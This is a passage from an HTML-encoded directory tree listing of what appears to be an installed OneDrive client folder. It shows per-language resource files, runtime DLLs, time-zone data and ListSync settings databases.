&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; SyncEngine.dll
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; ta
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; FileSync.LocalizedResources.dll.mui
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; localizable.json
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; te
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; FileSync.LocalizedResources.dll.mui
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; localizable.json
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Telemetry.dll
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; TestSharePage.html
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; tg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; FileSync.LocalizedResources.dll.mui
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; localizable.json
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; th
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; FileSync.LocalizedResources.dll.mui
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; localizable.json
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; ThirdPartyNotices.txt
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; ti
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; FileSync.LocalizedResources.dll.mui
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; localizable.json
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; tn-ZA
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; FileSync.LocalizedResources.dll.mui
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; localizable.json
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; ToastInfoIcon.png
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; tr
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; FileSync.LocalizedResources.dll.mui
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; localizable.json
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; tryforfree_dark.png
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; tryforfree_light.png
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; tt
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; FileSync.LocalizedResources.dll.mui
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; localizable.json
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; tzdata
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; africa
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; antarctica
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; asia
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; australasia
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; backward
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; etcetera
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; europe
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; leapseconds
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; northamerica
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; southamerica
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; version
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; windowsZones.xml
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; ucrtbase.dll
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; ug
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; FileSync.LocalizedResources.dll.mui
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; localizable.json
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; uk
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; FileSync.LocalizedResources.dll.mui
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; localizable.json
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; UpdateRingSettings.dll
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; ur
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; FileSync.LocalizedResources.dll.mui
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; localizable.json
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; vcamp140_app.dll
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; vccorlib140_app.dll
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; vcomp140_app.dll
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; vcruntime140_1_app.dll
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; vcruntime140_1.dll
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; vcruntime140_app.dll
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; vcruntime140.dll
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; vi
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; FileSync.LocalizedResources.dll.mui
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; localizable.json
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Warning.png
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; WebView2Loader.dll
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; WnsClientApi.dll
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; wo
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; FileSync.LocalizedResources.dll.mui
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; localizable.json
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; xh-ZA
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; FileSync.LocalizedResources.dll.mui
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; localizable.json
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; yo-NG
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; FileSync.LocalizedResources.dll.mui
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; localizable.json
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; zh-CN
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; FileSync.LocalizedResources.dll.mui
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; localizable.json
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; zh-TW
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; FileSync.LocalizedResources.dll.mui
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; localizable.json
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; zlib1.dll
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; ListSync
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Business1
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; settings
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; Microsoft.CDN.db
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; Microsoft.FilesOnDemand.db
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; Microsoft.FileUsageSync.db
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; Microsoft.ListSync.db
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9492;&#9472;&#9472; Microsoft.ListSync.Settings.db
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Common
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; settings
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9492;&#9472;&#9472; Microsoft.LocalContent.db
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; settings
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9492;&#9472;&#9472; NucleusUpdateRingConfig.json
